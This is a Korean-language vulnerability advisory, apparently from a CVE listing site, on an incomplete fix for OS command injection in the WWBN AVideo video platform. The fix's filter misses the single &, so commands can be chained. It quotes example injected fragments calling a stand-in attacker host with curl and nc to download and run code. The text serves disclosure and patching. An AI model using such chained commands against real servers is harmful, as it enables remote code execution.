WWBN AVideo는 오픈 소스 비디오 플랫폼입니다. 버전 29.0 이하는 CVE-2026-33482에 대한 수정이 불완전하고 여전히 단일 &(쉘 백그라운드 연산자)를 무력화하지 않기 때문에 OS 명령 삽입에 취약한 상태로 남아 있습니다. CVE-2026-33482는 sanitizeFFmpegCommand()(plugin/API/standAlone/functions.php)가 $(...) 명령 대체를 제거하지 못해 execAsync() sh -c 싱크에서 OS 명령 주입을 허용한다고 보고했습니다. 수정 사항(25c8ab90 커밋)은 거부에 $, (, ), {, }, \n, \r을 추가했습니다.
WWBN AVideo는 오픈 소스 비디오 플랫폼입니다. 버전 29.0 이하는 CVE-2026-33482에 대한 수정이 불완전하고 여전히 단일 &(쉘 백그라운드 연산자)를 무력화하지 않기 때문에 OS 명령 삽입에 취약한 상태로 남아 있습니다. CVE-2026-33482는 sanitizeFFmpegCommand()(plugin/API/standAlone/functions.php)가 $(...) 명령 대체를 제거하지 못해 execAsync() sh -c 싱크에서 OS 명령 주입을 허용한다고 보고했습니다. 수정 사항(커밋 25c8ab90)에서는 $, (, ), {, }, \n, \r을 거부 목록 문자 클래스와 str_replace('&&', '', ...)에 추가했지만 단일 &는 고려하지 않았습니다. ffmpeg.json.php는 _decryptString(getInput('codeToExecEncrypted'))에서 명령을 빌드합니다. 이는 원래 권고에서 받아들인 위협 모델(“유효한 암호화 페이로드를 만들 수 있는 공격자는 독립형 인코더 서버에서 임의의 명령 실행을 달성할 수 있습니다”)과 동일한 CVSS 기반(AV:N/AC:H/PR:N)입니다. &로 구분된 여러 명령을 연결할 수 있습니다(예: 다운로드 + 실행). 리디렉션 기반 페이로드는 > 스트립에 의해 차단되지만 명령 실행(예: & cur http://attacker/..., & nc ..., 파일 삭제/실행)은 차단되지 않습니다. 이 문제는 https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f 커밋으로 패치되었습니다.
왜 이 VPI인가 (설명가능 · 실험적)
VPI 산정 기준
| 영향도 | 81.00 |
| 악용 신호(추가 악용신호 없음) | ×1.00 |
| VPI | 81.00 |
VPI 공식 vpi-v1 기준